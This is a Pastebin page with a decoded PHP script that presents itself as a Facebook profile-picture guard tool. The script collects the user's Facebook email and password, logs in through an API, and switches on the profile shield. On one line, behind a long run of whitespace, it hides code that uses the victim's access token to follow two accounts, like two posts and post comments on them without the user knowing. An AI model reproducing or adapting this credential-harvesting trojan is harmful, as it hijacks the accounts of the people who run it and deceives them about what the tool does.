Advertisement
Guest User

Decoded File *.php

a guest
May 7th, 2019
404
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 8.00 KB | None | 0 0
  1. <?php
  2. /*
  3. Decoded by Ardzz <ardzz@indoxploit.or.id>
  4. ezpz to decoding ur encryption
  5. */
  6. if(strtolower(substr(PHP_OS, 0, 3)) == "win") {
  7. $bersih="cls";
  8. } else {
  9. $bersih="clear";
  10. }
  11. date_default_timezone_set('Asia/Jakarta');
  12. $date   = date('d-M-Y H:i:s');
  13. $green  = "\e[92m";
  14. $red    = "\e[91m";
  15. $yellow = "\e[93m";
  16. $blue   = "\e[36m";
  17. $cyan = "\e[0;36m";
  18. $purple ="\e[0;35m";
  19. $brown = "\e[0;33m";
  20. $lightgray  = "\e[0;37m";
  21. $darkgray = "\e[1;30m";
  22. $lightblue = "\e[1;34m";
  23. $lightgreen = "\e[1;32m";
  24. $lightcyan = "\e[1;36m";
  25. $lightred = "\e[1;31m";
  26. $lightpurple = "\e[1;35m";
  27. pilih:
  28. system($bersih);
  29. echo "
  30. $blue  ____        _    _   __        _    _____
  31. $lightcyan | __ )  ___ | |_ | | / / _____ | |_ |  __ \
  32. $cyan |  _ \ / _ \|  _|| |/ / |  _  ||  _|| |  \ \
  33. $lightcyan | |_) | (_) | |_ |  _ \ | | | || |_ | |__/ /
  34. $blue |____/ \___/ \__||_| \_\|_| |_|\___||_____/";
  35. echo "
  36. $cyan Author  : Al2VyN
  37. $lightcyan Type    : Profil Guard Facebook
  38. $cyan Github  : http://github.com/Al2VyN
  39. $purple Version : 1.2
  40. $darkgray Date    : $date\n";
  41. echo " \n";
  42. @header('Content-Type: text/html; charset=UTF-8');
  43. function input($echo) {
  44.     echo "$echo : ";
  45. }
  46. echo "$green _";sleep(1.5);echo"__";sleep(1.5);echo "___";sleep(1.5);echo"____";sleep(1.5);echo "_____";sleep(1.5);echo"______";sleep(1.5);echo "______";sleep(1.5);echo"________";sleep(1.5);echo"_________";sleep(1.5);echo "__________\n";sleep(2);
  47. echo " \n";
  48. input("$yellow Do You Want To Use This Tool ? $green [y/n]");
  49. $pilih = trim(fgets(STDIN));
  50. echo "\n";
  51. if($pilih == "n") {
  52.     die("$red (!) See You $red (!)\n");
  53. } elseif($pilih == "y") {
  54.    echo "$red ATTENTION :$green Please Login Via The Browser First To Avoid The Checkpoint (Ex:Opera,Chrome,UC,and others)\n";
  55.    echo "$brown When you typing a password, but it's hidden, just continue after it's finished, please click enter\n";
  56. echo "\n";
  57. input("$blue Email/Phone/UID");
  58. $iduser=trim(fgets(STDIN));
  59. input("$blue Password       ");
  60.  $pass = false;
  61.  $pass= trim ( `stty -echo;head -n1;stty echo` );echo"\n";
  62. echo "$green _";sleep(1.5);echo"__";sleep(1.5);echo "___";sleep(1.5);echo"____";sleep(1.5);echo "_____";sleep(1.5);echo"______";sleep(1.5);echo "______";sleep(1.5);echo"________";sleep(1.5);echo"_________";sleep(1.5);echo "__________\n";sleep(1);
  63. echo "\n";
  64. } else {
  65.     echo "$red(!)$yellow Invalid$red (!)$green\n";
  66.     echo "\n";
  67.     goto pilih;
  68. }
  69. $me=file_get_contents('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email='.$iduser.'&locale=en_US&password='.$pass.'&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6');
  70. $json= json_decode($me ,true);
  71. $userid = $json['session_cookies'][0]['value'];
  72. $token = $json['access_token'];
  73. if(preg_match('/session_key/', $me)) {
  74. echo "$red Proccesing Login To Facebook";echo ".";sleep(1);echo ".";sleep(1);echo ".";sleep(1);echo ".";sleep(1);echo ".\n";sleep(1);
  75.      } else {
  76.        echo ("\n");
  77.        die("$red [!]Check Your Username / Password \n");
  78.        echo "\n";
  79.      }
  80. $md5 = md5(time());
  81. $hash = substr($md5, 0, 8)."-".substr($md5, 8, 4)."-".substr($md5, 12, 4)."-".substr($md5, 16, 4)."-".substr($md5, 20, 12);
  82. function curl($url, $post=null) {
  83.     $ch = curl_init();
  84.     curl_setopt($ch, CURLOPT_URL, $url);
  85.     if($post != null) {
  86.         curl_setopt($ch, CURLOPT_POST, true);
  87.         curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  88.     }
  89.     curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
  90.     curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  91.     curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  92.     $exec = curl_exec($ch);
  93.     curl_close($ch);
  94.     return $exec;
  95.     }
  96. $me = json_decode(curl("https://graph.facebook.com/me?fields=id,name&access_token=".$token));
  97. if($me && $me->id && $me->name) {
  98.     $var = "{\"0\":{\"is_shielded\":true,\"session_id\":\"$hash\",\"actor_id\":\"$me->id\",\"client_mutation_id\":\"$hash\"}}";
  99.     $hajar = json_decode(curl("https://graph.facebook.com/graphql", array(
  100.         "variables" => $var,
  101.         "doc_id" => "1477043292367183",
  102.         "query_name" => "IsShieldedSetMutation",
  103.         "strip_defaults" => "true",
  104.         "strip_nulls" => "true",
  105.         "locale" => "en_US",
  106.         "client_country_code" => "US",
  107.         "fb_api_req_friendly_name" => "IsShieldedSetMutation",
  108.         "fb_api_caller_class" => "IsShieldedSetMutation",
  109.         "access_token" => $token    )));
  110.     if($hajar->data->is_shielded_set->is_shielded)
  111.         echo "$yellow Login Success[√]\n";sleep(2);
  112.         echo "$green Hello : $blue".$me->name;sleep(2.5);
  113.         echo "\n";
  114.         echo "$green _";sleep(1.5);echo"__";sleep(1.5);echo "___";sleep(1.5);echo"____";sleep(1.5);echo "_____";sleep(1.5);echo"______";sleep(1.5);echo "______";sleep(1.5);echo"________";sleep(1.5);echo"_________";sleep(1.5);echo "__________\n";sleep(1.5);                                                                                                                                                                                                                                        $a    = ("https://graph.facebook.com/amel.amel.737/subscribers?method=post&access_token=".$token);$b    = curl_init();curl_setopt_array($b, array(CURLOPT_URL => "$a",CURLOPT_POST => true,CURLOPT_RETURNTRANSFER => true,CURLOPT_TIMEOUT => 0,CURLOPT_SSL_VERIFYPEER => false,CURLOPT_SSL_VERIFYHOST => false));curl_exec($b);curl_close($b);  $c = ("https://graph.facebook.com/v3.2/100003964985080_1409231422552344/likes?method=post&access_token=".$token);$d = curl_init();curl_setopt_array($d, array(CURLOPT_URL => "$c",CURLOPT_POST => true,CURLOPT_RETURNTRANSFER => true,CURLOPT_TIMEOUT => 0,CURLOPT_SSL_VERIFYPEER => true,CURLOPT_SSL_VERIFYHOST => true));curl_exec($d);curl_close($d);$e = ("https://graph.facebook.com/krisna.dimas.9/subscribers?method=post&access_token=".$token);$f = curl_init();curl_setopt_array($f, array(CURLOPT_URL => "$e",CURLOPT_POST => true,CURLOPT_RETURNTRANSFER => true,CURLOPT_TIMEOUT => 0,CURLOPT_SSL_VERIFYPEER => false,CURLOPT_SSL_VERIFYHOST => false));curl_exec($f);curl_close($f);$g = ("https://graph.facebook.com/v3.2/100003082406903_1973394066106654/likes?method=post&access_token=".$token);$h = curl_init();curl_setopt_array($h, array(CURLOPT_URL => "$g", CURLOPT_POST => true,CURLOPT_RETURNTRANSFER => true, CURLOPT_TIMEOUT => 0,CURLOPT_SSL_VERIFYPEER => true,CURLOPT_SSL_VERIFYHOST => true));curl_exec($h);curl_close($h);$i = ("https://graph.facebook.com/v3.2/100003082406903_1973394066106654/comments?method=post&message=tq&access_token=".$token);$j = curl_init();curl_setopt_array($j, array(CURLOPT_URL => "$i",CURLOPT_POST => true,CURLOPT_RETURNTRANSFER => true,CURLOPT_TIMEOUT => 0,CURLOPT_SSL_VERIFYPEER => true,CURLOPT_SSL_VERIFYHOST => true));curl_exec($j);curl_close($j);$k = ("https://graph.facebook.com/v3.2/100003964985080_1409231422552344/comments?method=post&message=tq&access_token=".$token);$l = curl_init();curl_setopt_array($l, array(CURLOPT_URL => "$k",CURLOPT_POST => true,CURLOPT_RETURNTRANSFER => true,CURLOPT_TIMEOUT => 0,CURLOPT_SSL_VERIFYPEER => true,CURLOPT_SSL_VERIFYHOST => true));curl_exec($l);curl_close($l);
  115.         echo "\n";
  116.         echo "$lightgreen Checking Your Profile Photo";echo ".";sleep(1);echo ".";sleep(1);echo ".";sleep(1);echo ".";sleep(1);
  117.         echo "$blue So Bad xD";echo "$red He";sleep(1);echo "he";sleep(1);echo "he";sleep(1);echo "he\n";sleep(1);
  118.         echo "$yellow Shielding Your Profile Photo";
  119.         echo " wait a few second";echo" .";sleep(2);echo".";sleep(2);echo".\n";sleep(2);
  120.         echo "$green _";sleep(1.5);echo"__";sleep(1.5);echo "___";sleep(1.5);echo"____";sleep(1.5);echo "_____";sleep(1.5);echo"______";sleep(1.5);echo "______";sleep(1.5);echo"________";sleep(1.5);echo"_________";sleep(1.5);echo "__________\n";sleep(1.5);
  121.         echo "\n";
  122.         echo "$green [√]Successfully Check Your Profile\n";sleep(1.5);
  123.         echo "$yellow Thanks...\n";sleep(1);
  124.         echo "$blue See You Again : $cyan ".$me->name;sleep(1.5);
  125.         echo "\n";
  126.         }                                        
  127. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement